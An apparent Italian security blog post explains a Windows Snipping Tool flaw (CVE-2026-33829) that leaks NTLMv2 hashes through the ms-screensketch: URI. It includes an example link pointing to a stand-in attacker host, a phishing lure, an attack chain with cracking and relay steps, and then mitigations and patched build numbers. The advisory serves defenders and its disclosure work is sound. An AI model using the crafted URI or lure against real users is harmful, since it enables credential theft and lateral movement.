ADS

Visualizzazione post con etichetta SMB. Mostra tutti i post
Visualizzazione post con etichetta SMB. Mostra tutti i post

giovedì 7 maggio 2026

CVE-2026-33829 - Lo Snipping Tool che regala il tuo hash NTLM

Il succo della faccenda: clicci su un link, si apre lo Strumento di cattura di Windows come se niente fosse, e nel frattempo il tuo hash NTLMv2 (derivato dalla tua password di dominio o account locale) vola silenzioso verso un server controllato dall'attaccante. Nessun warning, nessun popup sospetto, zero sintomi visibili.

La Radice Tecnica

Lo Snipping Tool registra nel sistema un URI handler personalizzato chiamato ms-screensketch: (e ms-screenclip:), usato per aprire direttamente l'app tramite link dal browser o da altre app. Questo URI accetta un parametro filePath per indicare il file da aprire/modificare.

Il problema è brutalmente semplice: non c'è alcuna validazione del parametro filePath. Un attaccante può passargli un UNC path invece di un percorso locale:

Esempio:

ms-screensketch:edit?filePath=\\\\attacker.evil.com\\share\\badge.png

Quando Windows vede un percorso UNC (\\server\share\file), fa automaticamente una connessione SMB verso quel server. E quando apre una connessione SMB autenticata, trasmette automaticamente la risposta Net-NTLMv2 - ovvero un hash crittografico derivato dalla tua password - al server remoto.

Ecco un esempio fatto semplicemente su una cartella mappata:



La Catena d'Attacco (Attack Chain)

  1. Preparazione: L'attaccante mette in piedi un server SMB malevolo (es. con Responder) e crea un link ms-screensketch: con UNC path che punta a quel server

  2. Delivery: La vittima riceve il link via phishing email, pagina web compromessa, o messaggio Teams/Slack — mascherato da qualcosa di plausibile (es. "ritaglia la tua foto per il badge aziendale")

  3. Esecuzione: La vittima clicca e conferma l'apertura dello Strumento di cattura (unica interazione richiesta)

  4. Esfiltrazione silenziosa: Lo Snipping Tool tenta di caricare il file remoto via SMB → Windows invia automaticamente l'hash Net-NTLMv2 all'attaccante

  5. Post-exploitation: L'hash può essere:

    • Craccato offline con Hashcat/John the Ripper per recuperare la password in chiaro

    • Usato direttamente in un attacco NTLM Relay per autenticarsi ad altri servizi interni senza neanche craccare

Dati della Vulnerabilità

CampoDettaglio
CVECVE-2026-33829 nvd.nist
CVSS 3.14.3 (Medium) technochat
CWECWE-200 – Exposure of Sensitive Information
ComponenteWindows Snipping Tool (ms-screensketch: URI)
Scoperta daMarcos Díaz Castiñeiras – BlackArrow (Tarlogic) linkedin
Segnalata a Microsoft23 marzo 2026 redhotcyber
Patch rilasciata14 aprile 2026 (Patch Tuesday) technochat
PoC pubblicoSì, GitHub BlackArrow github

Perché il CVSS 4.3 Sottostima il Rischio Reale

Il punteggio "Medium" può ingannare. In ambienti Active Directory aziendali questo è un cazzo di problema serio per due motivi: [cybersecuritynews]

  • NTLM Relay: In reti dove NTLM non è bloccato/disabilitato e SMB signing non è enforced, l'hash può essere riutilizzato in tempo reale per autenticarsi a file server, SharePoint, Exchange  senza craccare nulla

  • Surface d'attacco enormissima: Lo Snipping Tool è preinstallato su ogni build di Windows, quindi potenzialmente colpisce ogni macchina Windows aziendale non aggiornata

Il MITRE ATT&CK mapping rilevante è T1550.002 – Pass the Hash per il movimento laterale.

Come Proteggersi

Fix immediato (obbligatorio):

  • Installare gli aggiornamenti di sicurezza di aprile 2026 su tutte le macchine Windows [redhotcyber]

Misure di hardening aggiuntive:

  • Bloccare il traffico SMB in uscita (porta 445) al perimetro della rete non dovrebbe mai uscire dall'infrastruttura interna [redhotcyber]

  • Monitorare connessioni SMB anomale in uscita con SIEM/EDR; BlackArrow ha già pubblicato query KQL specifiche per Microsoft Defender XDRx

  • Considerare la disabilitazione di NTLM dove possibile in favore di Kerberos (GPO: Network security: Restrict NTLM)

  • Abilitare SMB Signing obbligatorio su tutti i server per mitigare i relay attack

Per i Blue Team, SOC Prime ha già regole di detection dedicate per questo CVE.

Contesto Storico: Non è la Prima Volta

Questo attacco si inserisce in un pattern più ampio di URI handler abuse su Windows. Già nel 2025 era stata documentata una tecnica analoga con lo schema ms-photos:, e ad aprile 2026 era emerso un bug simile in Explorer (CVE-2026-32202) dove una patch Microsoft aveva essa stessa introdotto un leak di credenziali. Il problema sistemico è che Windows espone decine di URI handler registrati dalle sue app native, e la validazione dell'input in questi handler è storicamente lacunosa.

Verifica protezione

Se hai da WINVER una versione superiore a quella indicata in tabella ... Sei OK!

Versione WindowsBuild minima protettaCome verificare
Win 11 25H226200.8246winver oppure PowerShell
Win 11 24H226100.8246winver oppure PowerShell
Win 11 23H222631.6936winver oppure PowerShell
Win 10 22H219045.5858winver oppure PowerShell
Pubblicato da alle Nessun commento:
Etichette: , , , ,
Iscriviti a: Post (Atom)